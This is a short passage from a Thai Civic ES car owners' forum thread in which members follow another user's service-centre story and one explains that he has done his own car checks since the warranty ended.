0 เค้าไม่ชอบรถแต่ง ผมหละเบื่อ รำคาญช่างบ่น


เรื่องเป็นยังไง บอกต่อด้วยนะครับ รอฟังๆ
ได้รับคำขอบคุณจาก: hacker 
Lee_ES_turbo


เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
อาทิตย์, 4 ตุลา 2009 17:40 - ด่วน เรื่องจริงจากคนใช้รถ (ไม่อ่านจะเสียใจนะจ๊ะ)
ขอติดตามข่าวต่อไปเรื่อยนะคับ ส่วนตัวเข้าศุนย์แค่ตอนซื้อรถใหม่ๆ พอหมดวารันทรีแล้ว ก่อไม่เคยเข้าอีกเลย เช็คเองตลอดคับ
ได้รับคำขอบคุณจาก: hacker 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.